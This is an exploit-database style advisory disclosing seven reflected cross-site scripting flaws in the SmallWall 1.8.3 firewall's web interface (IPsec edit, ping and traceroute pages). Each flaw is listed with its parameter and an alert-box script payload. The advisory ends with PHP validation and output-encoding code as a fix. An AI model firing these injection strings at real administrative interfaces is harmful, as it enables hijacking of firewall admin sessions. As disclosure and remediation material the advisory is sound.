SmallWall 1.8.3 Cross Site Scripting

SmallWall version 1.8.3 suffers from multiple cross site scripting vulnerabilities.



##################################################################################################################################
# Exploit Title: SmallWall 1.8.3 | Cross-Site Scripting
# Date: 02.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.smallwall.org
# Software Link: http://www.smallwall.org/downloads/generic-pc-1.8.3.iso
# Version: 1.8.3
##################################################################################################################################

Introduction
A long time ago, a very smart guy asked a very simple question. "Why do
firewalls have to be big, slow, and hard to configure?" And he created
m0n0wall.

"m0n0wall was a project aimed at creating a complete, embedded firewall
software package that, when used together with an embedded PC, provided all
the important features of commercial firewall boxes (including ease of use)
at a fraction of the price (free software)."

At this, it was amazingly successful. So successful that the FreeBSD based
core was used as a basis for several other projects such as pfSense,
Askozia, FreeNAS, and nas4free. Recently, a grandchild of m0n0wall was
spawned from pfSense, OPNSense.

But, m0n0wall has retired now, and some of us still feel the need for a
small and lean firewall. SmallWall is that firewall.


#################################################################################


XSS details: Reflected

#################################################################################

XSS1 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
remotenet

PAYLOAD
"><script>alert(1)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
remotegw

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p1myident

PAYLOAD
"><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p1lifetime

PAYLOAD
"><script>alert(4)</script>

#################################################################################

XSS5 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p2lifetime

PAYLOAD
"><script>alert(5)</script>

#################################################################################

XSS6 | Reflected

URL
http://192.168.2.200/diag_ping.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200/diag_traceroute.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(7)</script>

#################################################################################
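
Every payload above begins with `">`, the sequence that closes a quoted HTML attribute and its tag, so the fix for all seven parameters is to validate each value on input and encode it whenever it is written back into the page. The PHP below is an added example, not SmallWall's own code: the field names come from the advisory, while the helper functions and the per-field validation rules are assumptions about what each value should contain.

```php
<?php
// Added example, not SmallWall source. Field names are taken from the advisory;
// the helpers and the rule chosen for each field are assumptions.

// Encode a value for HTML text and quoted-attribute contexts.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumed rule: p1lifetime / p2lifetime are positive integers.
function valid_lifetime(string $v): bool {
    return filter_var($v, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) !== false;
}

// Assumed rule: remotegw and the diagnostic "host" field are an IP address or a hostname.
function valid_host(string $v): bool {
    return filter_var($v, FILTER_VALIDATE_IP) !== false
        || filter_var($v, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
}

// Assumed rule: remotenet is an IPv4 network in CIDR notation.
function valid_cidr(string $v): bool {
    $parts = explode('/', $v);
    return count($parts) === 2
        && filter_var($parts[0], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false
        && ctype_digit($parts[1]) && (int)$parts[1] <= 32;
}

// Constructed POST body: two well-formed values and the XSS4 test string.
$post = [
    'remotenet'  => '10.0.0.0/24',
    'remotegw'   => '203.0.113.10',
    'p1lifetime' => '"><script>alert(4)</script>',
];
$rules = ['remotenet' => 'valid_cidr', 'remotegw' => 'valid_host',
          'p1lifetime' => 'valid_lifetime'];

$errors = [];
foreach ($rules as $field => $rule) {
    if (!$rule($post[$field] ?? '')) { $errors[] = $field; }
}
echo 'Rejected fields: ' . h(implode(', ', $errors)) . "\n";

// A form that redisplays rejected input still reflects it, so encode every value.
foreach ($post as $name => $value) {
    printf("<input name=\"%s\" type=\"text\" value=\"%s\">\n", h($name), h($value));
}
```

Validation alone is not enough here, because the rejected value is exactly the one the form echoes back; the encoding step is what keeps it inside the attribute.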
